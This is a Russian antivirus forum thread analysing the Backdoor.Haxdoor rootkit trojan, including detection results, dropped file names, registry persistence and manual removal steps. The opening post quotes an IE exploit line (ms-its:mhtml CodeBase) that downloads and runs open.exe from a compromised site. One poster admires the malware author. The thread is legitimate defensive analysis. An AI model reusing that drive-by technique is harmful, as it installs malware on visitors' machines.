# Форум на русском языке  > Угрозы информационной безопасности  > Вредоносные программы  > Описания вредоносных программ  >  BackDoor.Haxdoor устанавливается при просмотре сайтов

## Зайцев Олег

Сегодня на одном из ПК я изловил свежайшую разновидность Backdoor.Haxdoor. Оказалось, что троянская программа размещена в ресурсе:
хттп://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css
причем style.css является не стилем, как следует из расширения, а CHM архивом, содержащим инсталлятор указанного Backdoor. Инсталляция происходит при помощи кода:
     CodeBase: ms-its:mhtml:file://d:\foo.mht!http://techlabs.ru/forum/templates/s...css::/open.exe
     CLSID: {11111111-1111-1111-1111-222222222222}

Данная информация передана в лабораторию Касперского и другим вирусологам, но позволяет пролить свет на типовую методику внедрения данного зверя на компьютеры пользователей. Пользователь, которого занесло на указанный ресурс, работал под XP SP1 с включенным Firewall - и это его естественно не спасло. В ходе лечения на ПК изловлен типовой набор файлов, в частности:
open.exe - это инсталлятор "зверя", размер 44177 байт
wd.sys - 4096 байт
vdnt32.sys - 14832 байт
memlow.sys - 4096 байт
hm.sys - 14832 байт
draw32.dll - 33568 байт
cm.dll  - 33568 байт
Как и известные разновидности, данная применяет руткит-механизмы, основанные на перехвате функций в User и Kernel режиме.
Администрации сайта techlabs.ru я отписал письмо с описанием того, что их сайт применяется как источник зверя ....

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## userr

[quote author=Зайцев Олег link=board=4;threadid=1103;start=0#msg10446 date=1113370404]
Сегодня на одном из ПК я изловил свежайшую разновидность Backdoor.Haxdoor. Оказалось, что троянская программа размещена в ресурсе:
хттп://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css
причем style.css является не стилем, как следует из расширения, а CHM архивом, содержащим инсталлятор указанного Backdoor. Инсталляция происходит при помощи кода:
     CodeBase: ms-its:mhtml:file://d:\foo.mht!http://techlabs.ru/forum/templates/s...css::/open.exe
     CLSID: {11111111-1111-1111-1111-222222222222}
...
[/quote]
А можно пояснить, как происходит заражение? В некотором htm есть ссылка на  style.css, IE начинает автоматически "исполнять" style.css, несмотря на то, что это chm? А другие броузеры как себя поведут?

----------


## Зайцев Олег

> А можно пояснить, как происходит заражение? В некотором htm есть ссылка на  style.css, IE начинает автоматически "исполнять" style.css, несмотря на то, что это chm? А другие броузеры как себя поведут?


Да, примерно так ... вообще методик известно великое множество, наиболее распространенные относятся к категории Exploit.HTML.mht - в теле страницы встречается характерный код типа ... <object data="ms-its:mhtml:file: ... - при его исполнении происходит загрузка и выполнение вредоносного кода. В данном случае применена именно такая технология в типовой реализации - когда "зверь" хранится в CHM файле, причем имя и расширение файла не играют особого значения. Есть и другие варианты - с применением апплетов, JPEG картинок с модифицированным заголовком ...
Причем что интересно - я утром отправил создателям сайта techlabs.ru письмо с описанием ситуации - между тем вредоносный файл по прежнему на месте.

----------


## Geser

Может они так зарабатывают  :Smiley:

----------


## Участковый

Это только на IE работает?

----------


## Shu_b

Ради интереса переодически кидаю его на вирусскан...

на 15-16 msk:
NOD32 ***Found probably unknown NewHeur_PE (probable variant) 
VBA32 ***Found Trojan.LdPinch.4 (probable variant)

на 19:45  msk:
Dr.Web ***Found Trojan.PWS.LDPinch.394 
NOD32 ***Found probably unknown NewHeur_PE (probable variant) 
VBA32 ***Found Trojan.LdPinch.4 (probable variant)

----------


## Зайцев Олег

[quote author=Участковый link=board=4;threadid=1103;start=0#msg10516 date=1113402436]
Это только на IE работает?
[/quote]
Судя пл всему да. Я не проверял на других браузерах, но подобные эксплоиты характерны в основном для IE.

*Posted by: shu_b*  
Только интересно, почему DrWEB его запихали в разновидность LDPinch - по виду классический haxdoor, он весьма похож на разновидности ba и an, только чуть побольше в размере

----------


## Shu_b

на 14.04.05  22:20 msk

Dr.Web ***Found Trojan.PWS.LDPinch.394 
Kaspersky Anti-Virus ***Found Trojan-Dropper.Win32.Small.ta 
NOD32 ***Found probably unknown NewHeur_PE (probable variant) 
VBA32 ***Found Trojan.LdPinch.4 (probable variant)

----------


## Зайцев Олег

> на 14.04.05  22:20 msk
> 
> Dr.Web ***Found Trojan.PWS.LDPinch.394 
> Kaspersky Anti-Virus ***Found Trojan-Dropper.Win32.Small.ta 
> NOD32 ***Found probably unknown NewHeur_PE (probable variant) 
> VBA32 ***Found Trojan.LdPinch.4 (probable variant)


Сегодня вечером я получил ответ от ЛК - все компоненты "зверя" классифицировали как и предполагалось - Backdoor.Haxdoor.cr. От создателей сайта http://techlabs.ru ответ так и не пришел, но сегодня я качнул файлик style.css- уже "Ошибка 404"... - файл вроде как убрали

----------


## Shu_b

Последний раз на 15.04.05 20:00  msk:

BitDefender ***Found BehavesLike:Trojan.FirewallBypass (probable variant)
Dr.Web    Found Trojan.PWS.LDPinch.394 
Kaspersky Anti-Virus    Found Trojan-Dropper.Win32.Small.ta 
NOD32    Found probably unknown NewHeur_PE (probable variant) 
VBA32    Found Trojan.LdPinch.4 (probable variant)

----------


## serge

[quote author=Зайцев Олег link=board=4;threadid=1103;start=0#msg10523 date=1113408675]
Только интересно, почему DrWEB его запихали в разновидность LDPinch - по виду классический haxdoor, он весьма похож на разновидности ba и an, только чуть побольше в размере
[/quote]
Наверное нашему эвристику поверили  ;D

----------


## Sanja

хотя он и ошибся.... это ведь не пинчь... тогдаб уж назвали PSW-Trojan

----------


## gara77

хочу с вами познакомиться...

----------


## Geser

Со всеми сразу, или по очереди? :Smiley:

----------


## Sanja

:Smiley: )))

----------


## Гость

>[QUOTE=Зайцев Олег]Сегодня на одном из ПК я изловил свежайшую >разновидность Backdoor.Haxdoor. 

Это уже не свежая разновидность
хотя алгоритм тот же
Поймал у себя Haxdoor.cn версию этой заразы AVP не мог убить
файлы убиватьв Safe mode:

mszx32.exe - наверное теперь вместо open.exe

- cz.dll
- drct16.dll
- hz.sys
- vdmt16.sys
- winlow.sys
- wz.sys

лежит вся прелесть в system32
Кстати после изоляции вышеперечисленных файлов из родной папочки
каспер их стал видеть.

ну и в реестре ищите ссылки на winlow; vdmt16 и drct16

файлы перечисленные Олегом нифига не найдены, зато есть ключики в реестре (маскировка???) которые выносятся очень легко и просто.
Зато с ключами про winlow; vdmt16 придется попотеть.

Если создатель сего творения это прочитает, то пусть знает ОН ГАД КАКИХ МАЛО!!!!

----------


## Dr. Zorg

А я то думал, шо опять комп бочит! Ведь тока систему переустановил! Сначала я воевал с Bloodhound.w32.ep, теперь Нортон обновив, напоролся на Backdoor.Haxdoor. Полный идиотизм - я что, приманка для троянов?!! Короче - кончайте все вирусы, беспощадно!

----------


## pig

Спасибо за ценное описание (Гостю отдельно). Очень помогло.

----------


## HATTIFNATTOR

Перемещено в "Помогите" -
http://www.virusinfo.info/showthread.php?t=3281

----------


## Antivirus_KZ

Седня клиенты жаловались что у них в системе вирусня
Симантек 10.0 молчит как партизан (обновление 09.11.05)
Просканил систему с помощью AVZ 4.1

Лог скана не сохранил к сожалению....
Но AVZ сразу начал ругатся типа 
обнаружена маскировка процесса explorer.exe  и winlogon.exe
посморел через диспетчер процессов какие библиотеки использует 
увидев такие подозрительные как 
tcpQ32.dll - не есть гууд.
Заодно она прписалась в HKLM_SOFTWARE_Micrososft_WINNT_Winlogon
и оттудова никак не убирается....в Safe Mode тоже самое
Пришлось грузится с ERD и ручками рубить на корню в реестре
а заодно в System32...
После этого загрузился нормально и запустил скан Симантека
Мля скокоже он гадости надыбал 
Backdoor.haxdor.E
Вопрос почему до этого молчал?? Ведь же вирус не такой новый..
Приходилось сталкиватся, до этого Backdoor.haxdor.C

----------


## Antivirus_KZ

В поддержке симантека посморел по запросу Backdoor.Haxdoor.E
результат http://securityresponse.symantec.com...haxdoor.e.html

Мля.. как сказал Гость... Автор гад каких мало!!! :Angry:

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## MOCT

> Симантек 10.0 молчит как партизан (обновление 09.11.05)


семантек не очень надежный - он в местной рейтинге стоит на последнем месте.

пришлите логи сканирования AVZ и HJT (по правилам форума), возможно что-то осталось неисправленным.

если найденные зараженные файлы и tcpQ32.dll сохранились - пришлите пожалуйста на исследование.

----------


## Antivirus_KZ

Согласен Симантек не надежен особенно 9 и 8 версии...
Ну ничего не поделать... политика партии....
К сожалению ступил с самого начала....
файлы не сохранил...и лог тоже  :Cry:  

Зато копаясь в недрах реестра обнаружил 
что дрянь tcpQ32.dll и tcpQ64.sys 
прописались еще в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro  l\SafeBoot\Minimal
а также HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro  l\SafeBoot\Network

----------


## MOCT

> Зато копаясь в недрах реестра обнаружил 
> что дрянь tcpQ32.dll и tcpQ64.sys


пришлите пожалуйста эти файлы на исследование.

----------


## Гость

tcpq32.dll - Жуткая вещь. Данный вирус, мало того что не видит ни один антивирус, этот файл прячется так, что - ни впроцессах, ни в директории system32 (где он благополучно обитает) его нет.
Нашел эту гадость с помощью Hexprobe, глубоко-глубоко в процессах.

Что оно делает.

1. Выводит из строя ваш файервол. В моем случае Zone Alarm. Берет на себя службу TrueVector. Так-же блокирует несколько других служб, что оголяет ваш компьютер даже для школьника.
2. Блокирует запуск некоторых приложений. Например WinAmp, вырубает сразу просле загрузки.
3. Запрещает запуск некоторых антивирусов. В моем случае, даже не запускалась установка McAfee.
4. В I.E., пропадает основное меню (файл - правка - вид ...), А так-же, меню пользователя и избранное.
5. Самое жуткое. После входа в сеть, примерно минут через 5 (в зависимости от активности удаленного сервера хакера), происходит критическая ошибка памяти, что тут-же приводит к синему "экрану смерти" - Stop: c000021a {Fatal System Error} ...

Удалить эту заразу можно только через консоль восстановления, в ручную. Для этого нужно загрузится с утановочного диска и зайти в режим Repair (Восстановление). Перейти в каталог System32 (cd \windows\system32) и удалить tcpq32.dll (delete tcpq32.dll).

Вот такая вот кака. ((((

----------


## Гость

В догонку...

Мое подозрение, что это новый backdor.nthack, т.к. именно он вызывал фатал еррор. Хотя джины (newgina) нет нифига в реестре.

P.S. После удаления Dll-шника, проверьте систему несколько раз, возможно он еще натащил кучу троянов. Мое мнение, вирус достаточно опасен. Будьте бдительны.

----------


## azza

> В догонку...
> Мое подозрение, что это новый backdor.nthack...


This is a report processed by VirusTotal on 12/08/2005 at 12:34:14 (CET) after scanning the file "Tcpq32.dll" file.
Antivirus Version Update Result 

AntiVir 6.33.0.61 12.08.2005 no virus found 
Avast 4.6.695.0 12.07.2005 no virus found 
AVG 718 12.05.2005 no virus found 
Avira 6.33.0.61 12.08.2005 no virus found 
BitDefender 7.2 12.08.2005 Backdoor.Haxdoor.FD 
CAT-QuickHeal 8.00 12.08.2005 no virus found 
ClamAV devel-20051108 12.07.2005 no virus found 
DrWeb 4.33 12.08.2005 BackDoor.Haxdoor.173 
eTrust-Iris 7.1.194.0 12.07.2005 Win32/Haxdoor.Variant!HookDLL!Tr 
eTrust-Vet 11.9.1.0 12.08.2005 no virus found 
Fortinet 2.54.0.0 12.08.2005 suspicious 
F-Prot 3.16c 12.07.2005 no virus found 
Ikarus 0.2.59.0 12.08.2005 no virus found 
Kaspersky 4.0.2.24 12.08.2005 Backdoor.Win32.Haxdoor.fd 
McAfee 4645 12.07.2005 BackDoor-BAC.dll 
NOD32v2 1.1315 12.07.2005 a variant of Win32/Haxdoor 
Norman 5.70.10 12.08.2005 no virus found 
Panda 8.02.00 12.07.2005 Bck/Haxdoor.FA 
Sophos 4.00.0 12.08.2005 Troj/Haxdor-Fam 
Symantec 8.0 12.07.2005 no virus found 
TheHacker 5.9.1.051 12.08.2005 no virus found 
VBA32 3.10.5 12.08.2005 suspected of Trojan-Spy.Banker.71

----------


## Гость

У меня Dr.Web 4.33 вообще ничего не увидел. Видимо, это из-за скрытия (или какой-либо защиты от антивирей) происходило.

Почему-же тогда у меня система вылетала при коннекте с сетью? Ведь в описании вирусов семейства BackDoor.Haxdoor, такого глюка не наблюдалось. Или все-же бывает? В нете, по крайней мере, по этому поводу ничего не нашел.

----------


## Leonid

Привет!
Впервые попробовал вот твою программу.
Классная. Работает быстро и качественно, интерфейс приятный.
Попробовал просто так, но когда узрел результат (см. аттач) то стало не по себе. Непонятно, почему Касперский и ВЭБ пропускают, когда там столько нечисти, неужто нельзя было встроить модулем в них твою прогу? 
У меня просьба: глянь что на самом деле там такой страх что хоть ящик выбрасывай ? Я никогда раньше с этим не сталкивался: Касперский или ВЭБ отработал, вычистил и на этом все, а тут столько всего...
Еще раз спасибо!
Леонид.
mailto:[email protected]

----------


## Geser

> Привет!
> Впервые попробовал вот твою программу.
> Классная. Работает быстро и качественно, интерфейс приятный.
> Попробовал просто так, но когда узрел результат (см. аттач) то стало не по себе. Непонятно, почему Касперский и ВЭБ пропускают, когда там столько нечисти, неужто нельзя было встроить модулем в них твою прогу? 
> У меня просьба: глянь что на самом деле там такой страх что хоть ящик выбрасывай ? Я никогда раньше с этим не сталкивался: Касперский или ВЭБ отработал, вычистил и на этом все, а тут столько всего...
> Еще раз спасибо!
> Леонид.
> mailto:[email protected]


Гатор понятно, распространённая адварь. Касперу нужно расширенные базы поставить, скорее всего увидит. Остальные подозрения возможно ложняки. Нужно прислать на анализ файлы.

----------


## MOCT

> У меня просьба: глянь что на самом деле там такой страх что хоть ящик выбрасывай ? Я никогда раньше с этим не сталкивался: Касперский или ВЭБ отработал, вычистил и на этом все, а тут столько всего...


файлы
c:\program files\common files\gmt\egieprocess.dll
c:\Program Files\Common Files\GMT\EGIEProcess.dll
c:\Program Files\Teamspeak2_RC2\KeyPress.dll
рекомендуется прислать на анализ на [email protected] с паролем virus для анализа и добавления в базу.
остальные детектируемые файлы можно смело удалять - это шпионские модули.

----------


## Комикс

Я уже назнаю что делать... у меня стоит Symantec Corporate Editor 9.0
при проверке он нашел:
can type:  Realtime Protection Scan
Event:  Virus Found!
Virus name: Backdoor.Haxdoor
File:  C:\WINDOWS\system32\sertgs.dll
Location:  C:\WINDOWS\system32
Computer:  15-1
User:  alia
Action taken:  Clean failed : Quarantine failed : Access denied
посморел по сенмантику... он мне выдал несколько разновидностей этого вируса, но ни один из предложеных методов не помог... подскажите что делать???
у меня честно говоря осталдось тока однамысля... снести всю систему и поставить заного...

----------


## MOCT

> посморел по сенмантику... он мне выдал несколько разновидностей этого вируса, но ни один из предложеных методов не помог... подскажите что делать???
> у меня честно говоря осталдось тока однамысля... снести всю систему и поставить заного...


http://helpme.virusinfo.info

----------


## Xen

Попробуй просканировать систему утилитой XenAntiSpyware (можно взять с http://xen.name) и выложить сюда логи. Если у тебя засел только юзермодный руткит, должно помочь.

----------


## Alexey P.

Или провериться из безопасного режима CureIt-ом. В Правилах (см. http://helpme.virusinfo.info ) это написано, там же ссылка.

----------


## XL

Сегодня третий раз довелось встретиться с *haxdoor.ja* и первый раз его удалось завалить без осложнений в режиме пользователя. Помог avenger (отдельное спасибо RIC), autoruns для отслеживания драйверов и DLL'ок, AVZ для выявления перехватов. Вообщем эта мразь запускает пару драйверов(судя по названию для 32-х битной и 64-х битной ОС), одну DLL'ку с ключом в winlogon и маскирует процесс в памяти с произвольным именем. Плюс ко всему восстанавливает свои перехваты почти сразу же после их нейтрализации через AVZ. AVZ guard не помогает. В сэйф моде user mode rootkit также живет и процветает.

Как удалял: сначала через avenger вынес драйверы и dll'ку. Самое интересное, что после этого перехваты и маскировки все еще фиксировались даже после перезагрузки, хотя файлы вроде как исчезли из автозапуска и avz их уже не находил. Поставил NOD32 и только после этого перехваты исчезли, хотя NOD в памяти так ничего и не выцедил. Мистика...

И еще удивляет однообразие видового состава найденного зверья. Такое ощущение, что все загружается одним и тем же трояном.

----------


## celeron

> В поддержке симантека посморел по запросу Backdoor.Haxdoor.E
> результат http://securityresponse.symantec.com...haxdoor.e.html
> 
> Мля.. как сказал Гость... Автор гад каких мало!!!


Зря ты так.. Я знаком с автором этого троя (не в реале). Наш соотечественник, профессионал высокого уровня. Ты вобще представляешь, что значит писать Kernel Mode rootkit, User Mode rootkit? Когда одна часть работает в драйвере на нулевом кольце, вторая в dll в User Mode, через спец интерфейс взаимодействуя с первой.. Перехват Native API, вобщем вещь на уровне.. Просто каждый зарабатывает по своему.. Не суди и не судим будешь.

----------


## _HEKTO_

> Зря ты так.. Я знаком с автором этого троя (не в реале). Наш соотечественник, профессионал высокого уровня. Ты вобще представляешь, что значит писать Kernel Mode rootkit, User Mode rootkit? Когда одна часть работает в драйвере на нулевом кольце, вторая в dll в User Mode, через спец интерфейс взаимодействуя с первой.. Перехват Native API, вобщем вещь на уровне.. Просто каждый зарабатывает по своему.. Не суди и не судим будешь.


Угу. А я знаком с парой профессиональных карманников - милейшие люди.

Думаем прежде чем говорить или как?

----------


## MedvedD

Ну сейчас начнётся война..

----------


## pig

ЦЫтата:
"<Имярек, известный бард> - конечно, гад, но гений" (c) Ваня Густов
Имя барда censored во избежание. Тем более, что близкого знакомства я с ним не имел.

----------


## Sanja

> Зря ты так.. Я знаком с автором этого троя (не в реале). Наш соотечественник, профессионал высокого уровня. Ты вобще представляешь, что значит писать Kernel Mode rootkit, User Mode rootkit? Когда одна часть работает в драйвере на нулевом кольце, вторая в dll в User Mode, через спец интерфейс взаимодействуя с первой.. Перехват Native API, вобщем вещь на уровне.. Просто каждый зарабатывает по своему.. Не суди и не судим будешь.


Не самый сложный троян бекдор если честно Ж)
И дривер кривоват )) Бсодит частенько Ж)

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## celeron

> И дривер кривоват )) Бсодит частенько Ж)


Ну не знаю, у меня не разу не бсодил )))

----------


## celeron

В тему
http://www.securitylab.ru/news/271471.php
)))

----------


## Sanja

Ток ненадо тут рекламировать А311 плиз Ж)

----------


## MOCT

статья A311Death inside из зина FH0 :
http://damagelab.org/index.php?act=A...e=post&id=1120

----------


## Valeryi

Сайт, 
который уже долгое время, пытается “засылать” на компьютер,
через Internet Explorer,
различные вирусно-шпионские программы.
Притом, примерно раз в неделю, он их, меняет.
Сайт: <http://www.w###ader.ru>
Сегодня, подгружает трояна, VMLFill,
сайт: <http://wwwf###lancers.com/l00p.html>

----------

